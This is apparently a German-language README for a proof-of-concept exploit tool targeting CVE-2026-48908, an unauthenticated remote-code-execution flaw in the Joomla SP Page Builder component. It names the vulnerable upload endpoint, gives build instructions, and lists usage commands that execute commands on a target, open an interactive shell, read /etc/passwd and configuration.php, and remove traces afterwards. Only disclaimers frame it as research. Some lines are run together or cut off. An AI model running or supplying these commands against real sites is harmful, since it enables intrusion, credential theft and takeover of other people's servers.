CVE-2026-48908 - SP Page Builder Joomla Unauthenticated RCE
Proof-of-Concept-Exploit für CVE-2026-48908, eine nicht authentifizierte Remote Code Execution-Schwachstelle in der Joomla SP Page Builder-Komponente.
CVE-2026-48908 ist eine kritische Sicherheitsschwachstelle, die es nicht authentifizierten Angreifern ermöglicht, beliebigen Code auf verwundbaren Joomla-Installationen auszuführen, indem die ZIP-Dateiextraktion in der SP Page Builder-Komponente unsachgemäß behandelt wird.
| Attribut | Details |
|---|
| CVE-ID: | CVE-2026-48908 |
| Komponente: | com_sppagebuilder |
| Betroffene Versionen: | <= 6.6.1 |
| Behobene Version: | 6.6.2 |
| Angriffsvektor: | Netzwerkbasiert, nicht authentifiziert |
| CVSS-Bewertung: | Kritisch |
| Schwachstellentyp: | Beliebiger Datei-Upload / ZIP-Extraktion RCE |
| Angriffsendpunkt: | index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon |
Die Schwachstelle liegt in der Asset-Upload-Funktionalität, bei der die Anwendung ZIP-Dateien mit Icon-Assets unsachgemäß validiert und extrahiert. Ein Angreifer kann eine bösartige ZIP-Datei mit PHP-Payloads erstellen, die in das webbasierte Verzeichnis extrahiert werden, was eine Remote-Code-Ausführung ermöglicht.
golang.org/x/term - Terminal-Dienstprogramme für sichere Passworteingabegit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
Kompilierte Binärdateien sind im Bereich 'Releases' verfügbar.


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
Target URL of vulnerable Joomla installation (required)
Example: http://target.com or https://target.com
-cmd string
System command to execute on target
Example: "cat /etc/passwd"
-shell
Launch interactive shell on target (requires successful exploitation)
-check
Check if target is vulnerable without attempting exploitation
-cleanup
Remove uploaded shell and artifacts from target
-token string
CSRF token for exploitation (optional, auto-detected if not provided)
Das Tool unterstützt mehrere Exploit-Vektoren:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
Wenn Sie Joomla mit der SP Page Builder-Komponente betreiben:
Diese Software wird nur für Bildungs- und autorisierte Sicherheitstests bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Die Nutzer sind dafür verantwortlich, sicherzustellen, dass sie vor der Verwendung dieses Tools auf einem Zielsystem die entsprechende Autorisierung haben.
Durch die Nutzung dieses Tools erkennen Sie an, dass:
Dieses Tool ist nur für defensive Sicherheitsforschung und autorisierte Penetrationstests gedacht. Unbefugter Zugriff auf Computersysteme verstößt gegen den Computer Fraud and Abuse Act und ähnliche Gesetze in anderen Jurisdiktionen. Holen Sie vor der Durchführung von Sicherheitstests stets eine schriftliche Genehmigung ein.
index.php?option=com_installer&view=manageBeiträge zur Sicherheitsforschung sind willkommen. Bitte:
GhostGTR666 (Gagaltotal666)
Bei Problemen, Fragen oder Beiträgen:
Dieses Projekt wird wie besehen für Sicherheitsforschungszwecke bereitgestellt. Überprüfen Sie vor der Nutzung die lokalen Gesetze zu Sicherheitstools und Penetrationstests.
Zuletzt aktualisiert: 2026-06-24
Haftungsausschluss: Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal.